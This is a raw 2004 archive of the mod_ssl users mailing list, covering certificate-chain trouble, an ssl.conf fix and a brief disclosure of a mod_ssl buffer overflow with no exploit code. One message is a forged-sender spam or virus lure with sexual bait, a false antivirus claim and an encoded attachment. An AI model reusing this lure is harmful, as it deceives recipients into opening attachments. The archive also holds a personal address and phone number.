>> What I am seeing is the Netscape and Mozilla connect to the site just
>> fine.  When I connect to the site with IE 6 the security window pops up
>> telling be  that the certificate has either expired or is not valid yet.
>> When I look  at the certificate the intermediate CA cert that IE is
>> using is the expired  cert that was installed with IE.  I tried removing
>> the old intermediate CA  cert from IE altogether and it still will not
>> load the intermediate CA cert  from my server.
>>
>> I am not really sure what to try at this point.   Oh, yes, Verisign
>> support  has been pretty much useless.
>>
>> Help suggestions will be greatly appreciated.
>>
>> Bill
>>
>> +---------------------------------------------------
>> | Bill MacAllister
>> | 14219 Auburn Road
>> | Grass Valley, CA 95949
>> | 530-272-8555
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
> --
> Christopher McCrory
>  "The guy that keeps the servers running"
>
> chrismcc@pricegrabber.com
>  http://www.pricegrabber.com
>
> Let's face it, there's no Hollow Earth, no robots, and
> no 'mute rays.' And even if there were, waxed paper is
> no defense.  I tried it.  Only tinfoil works.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



+---------------------------------------------------
| Bill MacAllister
| 14219 Auburn Road
| Grass Valley, CA 95949
| 530-272-8555
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 22 07:35:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BC6B5A8A4D; Sat, 22 May 2004 07:35:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx-old.j10n.org (203.141.155.228.user.ca.il24.net [203.141.155.228])
	by master.modssl.org (Postfix) with ESMTP id 1ED5BA893B
	for ; Sat, 22 May 2004 07:35:36 +0200 (CEST)
Received: from korea.j10n.org.j10n.org (korea.j10n.org [IPv6:2002:cb8d:9be4:1:203:93ff:feef:5060])
	(authenticated bits=0)
	by mx-old.j10n.org (8.12.9p2/8.12.9) with ESMTP id i4M5ZQqu029351
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
	for ; Sat, 22 May 2004 14:35:29 +0900 (JST)
	(envelope-from shinra@j10n.org)
Date: Sat, 22 May 2004 14:35:25 +0900
Message-ID: 
From: AIDA Shinra 
To: modssl-users@modssl.org
Subject: "License" of ca-bundle.crt
User-Agent: Wanderlust/2.10.1 (Watching The Wheels) SEMI/1.14.6 (Maruoka) FLIM/1.14.6 (Marutamachi) APEL/10.6 MULE XEmacs/21.4 (patch 15) (Security Through Obscurity) (powerpc-apple-darwin7.2.0)
MIME-Version: 1.0 (generated by SEMI 1.14.6 - "Maruoka")
Content-Type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: AIDA Shinra 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am packaging sole ca-bundle.crt for Fink.
http://sourceforge.net/tracker/index.php?func=detail&aid=928157&group_id=17203&atid=414256

Fink package system has "License" field. I must fill it. What is the
"license" of sole ca-bundle.crt? Mod_ssl license? Or nothing like
"license"?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 22 07:38:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 73F4AA8972; Sat, 22 May 2004 07:38:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 44DCEA8939
	for ; Sat, 22 May 2004 07:38:43 +0200 (CEST)
Date: Sat, 22 May 2004 06:27:24 +0000
From: a.moon@mdx.ac.uk
Subject: "License" of ca-bundle.crt
To: modssl-users@modssl.org
Message-id: <15CCC741FB7@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.20
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on paternity leave for the next few days.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 22 14:23:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AC617A8A4D; Sat, 22 May 2004 14:23:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from think3.org (pool-68-162-43-102.nwrk.east.verizon.net [68.162.43.102])
	by master.modssl.org (Postfix) with SMTP id D6D25A8972
	for ; Sat, 22 May 2004 14:23:03 +0200 (CEST)
Date: Sat, 22 May 2004 08:20:12 -0800
To: modssl-users@modssl.org
Subject: Re: Yahoo!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 24 15:04:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 99C54A8973; Mon, 24 May 2004 15:04:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.de [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 2A18AA8962
	for ; Mon, 24 May 2004 15:03:51 +0200 (CEST)
Received: (qmail 12789 invoked by uid 65534); 24 May 2004 13:03:41 -0000
Received: from 217-68-167-99.cable.primacom.net (EHLO michael64) (217.68.167.99)
  by mail.gmx.net (mp009) with SMTP; 24 May 2004 15:03:41 +0200
X-Authenticated: #216356
From: "Michael Pfannkuchen" 
To: 
Subject: AW: T-Online software 5.0
Date: Mon, 24 May 2004 15:03:39 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
In-Reply-To: <1084979211.26004.47.camel@andes.core.aeccom.com>
Thread-Index: AcQ9swZ1YZx0sKudTbmuZZ5Gc0MhZQD2jFzw
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Message-Id: <20040524130351.2A18AA8962@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pfannkuchen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hallo Sven,


these client-related problems  are strange sometimes : I remember a =
problem,
where MSIE browsers crashed when using Javascript to load pictures over =
a
SSL-connection ...

But to your problem:
I'd start to play with the following setting in your ssl.conf:

> SetEnvIf User-Agent     .*MSIE. 5.*"    ssl-unclean-shutdown=20
> nokeepalive

Maybe there is only a '"' missed before the RegEx ...


Good luck : michael

> -----Urspr=FCngliche Nachricht-----
> Von: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] Im Auftrag von Sven Geisler
> Gesendet: Mittwoch, 19. Mai 2004 17:07
> An: modssl-users@modssl.org
> Betreff: T-Online software 5.0
>=20
> Hi,
>=20
> I upgraded from RedHat 7.3 to RedHat Enterprise Linux 3.0=20
> with httpd-2.0.46-32.ent.rpm and mod_ssl-2.0.46-32.ent.rpm.
> Users with T-Online software 5.0 can't use https since this update.
> Http works fine for this users.
> I used the standard rpm from RedHat 7.3 before.
>=20
> The browser sting of the T-Online software:
> "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT)"
>=20
> Did anyone have an idea?
>=20
> Sven.
>=20
> My ssl config:
>=20
> SSLPassPhraseDialog     builtin
> SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
> SSLSessionCacheTimeout  300
> SSLMutex  file:logs/ssl_mutex
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLCipherSuite        =20
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
> SSLCertificateFile      conf/ssl.crt/...
> SSLCertificateKeyFile	conf/ssl.key/...
> SetEnvIf User-Agent     ".*MSIE.*"      ssl-unclean-shutdown
> SetEnvIf User-Agent     .*MSIE. 5.*"    ssl-unclean-shutdown=20
> nokeepalive
> downgrade-1.0 force-response-1.0
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
>=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 24 15:09:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C3F8FA8973; Mon, 24 May 2004 15:09:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id B5FF7A8A4D
	for ; Mon, 24 May 2004 15:09:23 +0200 (CEST)
Date: Mon, 24 May 2004 13:58:13 +0000
From: a.moon@mdx.ac.uk
Subject: AW: T-Online software 5.0
To: modssl-users@modssl.org
Message-id: <194531D460B@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.20
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on paternity leave for the next few days.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 24 16:16:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 817E8A8973; Mon, 24 May 2004 16:16:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (ftp.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id 47BDCA8962
	for ; Mon, 24 May 2004 16:16:13 +0200 (CEST)
Received: from localhost (toro [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id 900A664009
	for ; Mon, 24 May 2004 16:16:02 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id F19D364005
	for ; Mon, 24 May 2004 16:16:01 +0200 (CEST)
Received: from [192.168.2.14] (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP id A103D70
	for ; Mon, 24 May 2004 16:16:01 +0200 (CEST)
Subject: Re: AW: T-Online software 5.0
From: Sven Geisler 
To: modssl-users@modssl.org
In-Reply-To: <20040524130351.2A18AA8962@master.modssl.org>
References: <20040524130351.2A18AA8962@master.modssl.org>
Content-Type: text/plain; charset=iso-8859-15
Organization: AEC/communications GmbH
Message-Id: <1085408161.8008.63.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-7) 
Date: Mon, 24 May 2004 16:16:01 +0200
Content-Transfer-Encoding: quoted-printable
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Michael,

Sometimes the solution is simple.
You're properly right. I fixed the .conf.

Thx
Sven.


Am Mo, den 24.05.2004 schrieb Michael Pfannkuchen um 15:03:
> Hallo Sven,
>=20
>=20
> these client-related problems  are strange sometimes : I remember a pro=
blem,
> where MSIE browsers crashed when using Javascript to load pictures over=
 a
> SSL-connection ...
>=20
> But to your problem:
> I'd start to play with the following setting in your ssl.conf:
>=20
> > SetEnvIf User-Agent     .*MSIE. 5.*"    ssl-unclean-shutdown=20
> > nokeepalive
>=20
> Maybe there is only a '"' missed before the RegEx ...
>=20
>=20
> Good luck : michael
>=20
> > -----Urspr=FCngliche Nachricht-----
> > Von: owner-modssl-users@modssl.org=20
> > [mailto:owner-modssl-users@modssl.org] Im Auftrag von Sven Geisler
> > Gesendet: Mittwoch, 19. Mai 2004 17:07
> > An: modssl-users@modssl.org
> > Betreff: T-Online software 5.0
> >=20
> > Hi,
> >=20
> > I upgraded from RedHat 7.3 to RedHat Enterprise Linux 3.0=20
> > with httpd-2.0.46-32.ent.rpm and mod_ssl-2.0.46-32.ent.rpm.
> > Users with T-Online software 5.0 can't use https since this update.
> > Http works fine for this users.
> > I used the standard rpm from RedHat 7.3 before.
> >=20
> > The browser sting of the T-Online software:
> > "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT)"
> >=20
> > Did anyone have an idea?
> >=20
> > Sven.
> >=20
> > My ssl config:
> >=20
> > SSLPassPhraseDialog     builtin
> > SSLSessionCache         shmcb:/var/cache/mod_ssl/scache(512000)
> > SSLSessionCacheTimeout  300
> > SSLMutex  file:logs/ssl_mutex
> > SSLRandomSeed startup builtin
> > SSLRandomSeed connect builtin
> > SSLCipherSuite        =20
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
> > SSLCertificateFile      conf/ssl.crt/...
> > SSLCertificateKeyFile	conf/ssl.key/...
> > SetEnvIf User-Agent     ".*MSIE.*"      ssl-unclean-shutdown
> > SetEnvIf User-Agent     .*MSIE. 5.*"    ssl-unclean-shutdown=20
> > nokeepalive
> > downgrade-1.0 force-response-1.0
> >=20
> >=20
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g
> >=20
> >=20
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 24 20:51:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8F7DEA8973; Mon, 24 May 2004 20:51:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (ae13224.emirates.net.ae [217.164.63.176])
	by master.modssl.org (Postfix) with SMTP id 79EDFA8958
	for ; Mon, 24 May 2004 20:51:25 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: FW:RE: Least *21* Years
Date: 25 May 2004 22:50:39 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040524185125.79EDFA8958@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Cum and check this fun group out...Sexy ladies!! Come post your ad,..this is a real swingers group!! I'm attatching a Video Clip of my wife if interested in checking it out!
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 25 09:43:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 563B1A8973; Tue, 25 May 2004 09:43:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id CC67CA8940
	for ; Tue, 25 May 2004 09:43:06 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id i4P7gwGF014691
	for ; Tue, 25 May 2004 09:42:58 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i4P7gwXk014293
	for ; Tue, 25 May 2004 09:42:58 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: SSL_Util_UUEncode_Binary Stack Buffer Overflow Vulnerability
Date: Tue, 25 May 2004 09:42:58 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL_Util_UUEncode_Binary Stack Buffer Overflow Vulnerability
Importance: normal
Thread-Index: AcRCK+Xql4bknarDQ2+lClzEBiKDGA==
From: "Boyle Owen" 
To: "mod_ssl list (E-mail)" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetings,

This "alert" has appeared recently. Is anyone aware of it?=20

http://www.securityfocus.com/bid/10355/info/

There's nothing in CVE, Apache or mod_ssl about it...

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 25 14:59:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 38CD0A8973; Tue, 25 May 2004 14:59:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 4F30EA8940
	for ; Tue, 25 May 2004 14:59:13 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i4PCx4i5022228;
	Tue, 25 May 2004 08:59:04 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i4PCx3020065;
	Tue, 25 May 2004 08:59:03 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i4PCx2Mi009418;
	Tue, 25 May 2004 13:59:02 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i4PCx2cI009417;
	Tue, 25 May 2004 13:59:02 +0100
Date: Tue, 25 May 2004 13:59:02 +0100
From: Joe Orton 
To: Boyle Owen 
Cc: "mod_ssl list (E-mail)" 
Subject: Re: SSL_Util_UUEncode_Binary Stack Buffer Overflow Vulnerability
Message-ID: <20040525125902.GB8346@redhat.com>
Mail-Followup-To: Boyle Owen ,
	"mod_ssl list (E-mail)" 
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, May 25, 2004 at 09:42:58AM +0200, Boyle Owen wrote:
> Greetings,
> 
> This "alert" has appeared recently. Is anyone aware of it? 

Yes, this is CVE CAN-2004-0488. It can only be triggered if mod_ssl is
configured to use FakeBasicAuth and will trust a CA which issues a
client cert with a >6K long subject DN.

I checked in a fix for 2.0 earlier:

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_kernel.c?r1=1.105&r2=1.106

fixes for mod_ssl 2.8 should be forthcoming.

> http://www.securityfocus.com/bid/10355/info/

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 14:49:36 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7E143A895E; Thu, 27 May 2004 14:49:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from master.openssl.org (master.openssl.org [195.27.176.155])
	by master.modssl.org (Postfix) with ESMTP id D38C0A8933
	for ; Thu, 27 May 2004 14:49:35 +0200 (CEST)
Received: by master.openssl.org (Postfix, from userid 1000)
	id C4546203EC3; Thu, 27 May 2004 14:49:35 +0200 (CEST)
